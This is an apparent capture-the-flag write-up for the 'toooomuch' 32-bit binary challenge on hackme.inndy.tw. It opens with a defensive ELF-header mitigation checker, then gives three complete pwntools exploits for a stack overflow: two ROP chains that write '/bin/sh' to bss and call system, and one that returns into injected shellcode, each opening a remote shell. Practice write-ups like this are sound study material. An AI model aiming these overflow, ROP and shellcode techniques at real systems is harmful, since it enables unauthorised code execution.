Running checksec shows no protections at all, so there is no need to find the libc version.
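The "no protections" verdict above is exactly what a build or CI gate should be flagging before a binary ships. As an added example (not code from the original writeup), the following script derives the NX, PIE and RELRO bits the same way checksec does, from the ELF32 headers alone, and reports which mitigations are missing. Both ELF images it inspects are constructed inline with a small builder so the script runs offline; stack canaries need the symbol table (`__stack_chk_fail`) and are deliberately not covered.

```python
import struct

# Program-header types and flags from the ELF specification.
PT_LOAD = 1
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
ET_EXEC, ET_DYN = 2, 3


def parse_elf32_headers(data):
    """Return (e_type, program headers) for a little-endian ELF32 image."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 1 or data[5] != 1:
        raise ValueError("only little-endian ELF32 is handled here")
    (e_type, _machine, _version, _entry, e_phoff, _shoff, _flags,
     _ehsize, e_phentsize, e_phnum) = struct.unpack_from("<HHIIIIIHHH", data, 16)
    phdrs = []
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        (p_type, _offset, p_vaddr, _paddr, _filesz, p_memsz,
         p_flags, _align) = struct.unpack_from("<IIIIIIII", data, off)
        phdrs.append({"type": p_type, "flags": p_flags,
                      "vaddr": p_vaddr, "memsz": p_memsz})
    return e_type, phdrs


def check_protections(data):
    """NX / PIE / RELRO as checksec reports them, from the headers only."""
    e_type, phdrs = parse_elf32_headers(data)
    stack = [p for p in phdrs if p["type"] == PT_GNU_STACK]
    # A missing PT_GNU_STACK means the loader falls back to an executable
    # stack, so that case counts as NX disabled too.
    nx = bool(stack) and not (stack[0]["flags"] & PF_X)
    relro = any(p["type"] == PT_GNU_RELRO for p in phdrs)
    pie = e_type == ET_DYN
    return {"NX": nx, "PIE": pie, "RELRO": relro}


def missing_mitigations(data):
    """Sorted names of the mitigations a binary lacks (empty list = all present)."""
    return sorted(name for name, on in check_protections(data).items() if not on)


def build_elf32(e_type, phdr_list):
    """Construct a minimal ELF32 image (header + program headers) for the demo.
    Constructed test data, not a real binary: no code or sections are included."""
    phoff = 52  # program headers follow the 52-byte ELF header directly
    ehdr = struct.pack("<16sHHIIIIIHHHHHH",
                       b"\x7fELF\x01\x01\x01" + b"\x00" * 9,  # ELF32, LE, v1
                       e_type, 3, 1, 0x8048000, phoff, 0, 0,  # EM_386
                       52, 32, len(phdr_list), 40, 0, 0)
    body = b"".join(struct.pack("<IIIIIIII", t, 0, 0, 0, 0, 0, f, 4)
                    for t, f in phdr_list)
    return ehdr + body


# Constructed sample images: one built like the challenge binary (executable
# stack, fixed load address, no RELRO) and one with every header-level mitigation.
UNPROTECTED = build_elf32(ET_EXEC, [(PT_LOAD, PF_R | PF_X),
                                    (PT_GNU_STACK, PF_R | PF_W | PF_X)])
HARDENED = build_elf32(ET_DYN, [(PT_LOAD, PF_R | PF_X),
                                (PT_GNU_STACK, PF_R | PF_W),
                                (PT_GNU_RELRO, PF_R)])

if __name__ == "__main__":
    for label, image in (("unprotected", UNPROTECTED), ("hardened", HARDENED)):
        print(label, check_protections(image), "missing:", missing_mitigations(image))
```

To audit a real file, pass `open(path, "rb").read()` to `missing_mitigations`; a non-empty result for an executable stack is what makes the shellcode-in-bss variant (exp3 below) possible, and a missing PIE is what lets the fixed `gets`, `system` and gadget addresses in the exploits be hard-coded.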
The vulnerability here was already covered in the toomuch1 writeup.
In the toooomuch function, overwriting 0x18 + 4 bytes is enough to trigger the overflow.
The next goal is to write "/bin/sh" into the bss section and then call the system function.
As on x64, x86 also has comparable universal gadgets.
exp1:
Using gets + system:

#!/usr/bin/env python
# coding=utf-8
from pwn import *

#io = process("./toooomuch")
io = remote("hackme.inndy.tw", 7702)
elf = ELF("./toooomuch")

gets = elf.symbols['gets']
log.info("gets_addr = " + str(hex(gets)))
bss = elf.bss()
log.info("bss_addr = " + str(hex(bss)))

pr = 0x804889B            # pop ; ret gadget
system_plt = 0x080484C0   # system@plt

# 0x18 bytes of buffer plus 4 bytes before the return address
payload = "A" * 0x18 + "B" * 4
# gets(bss) reads "/bin/sh" into bss, then system(bss)
payload += p32(gets) + p32(pr) + p32(bss)
payload += p32(system_plt) + p32(pr) + p32(bss) + p32(0xABCD)

io.sendline(payload)
sleep(1)
io.sendline("/bin/sh\x00")
io.interactive()
exp2:

#!/usr/bin/env python
# coding=utf-8
from pwn import *

#io = process("./toooomuch")
io = remote("hackme.inndy.tw", 7702)
elf = ELF("./toooomuch")

gets = elf.symbols['gets']
log.info("gets_addr = " + str(hex(gets)))
bss = elf.bss()
log.info("bss_addr = " + str(hex(bss)))

pr = 0x804889B        # pop ; ret gadget
system = 0x8048649    # the call to system inside the binary's own function (followed by pop / retn)

payload = "A" * 0x18 + "B" * 4
payload += p32(gets) + p32(pr) + p32(bss)
payload += p32(system) + p32(bss) + p32(0xABCD)

io.sendline(payload)
sleep(1)
io.sendline("/bin/sh\x00")
io.interactive()
Analysis:
Difference between exp1 and exp2: in exp1, system is called through system_plt, which is not followed by a pop-ret, i.e. there is no return address in place, so one has to be constructed by hand.
In exp2, what is called is the call to system inside the function, which is followed by pop and retn, i.e. the stack gets restored.
Single-stepping in a debugger shows the difference.
exp3:

#!/usr/bin/env python
# coding=utf-8
from pwn import *

elf = ELF("./toooomuch")
io = remote("hackme.inndy.tw", 7702)

gets = elf.symbols['gets']
bss = elf.bss()
log.info("gets addr = " + str(hex(gets)))
log.info("bss addr = " + str(hex(bss)))

payload = "A" * 0x18 + "B" * 4
# gets(bss) reads shellcode into bss, then return into bss (only works because NX is off)
payload += p32(gets) + p32(bss) + p32(bss)

io.recvuntil("passcode: ")
io.sendline(payload)
io.sendline(asm(shellcraft.sh()))
io.interactive()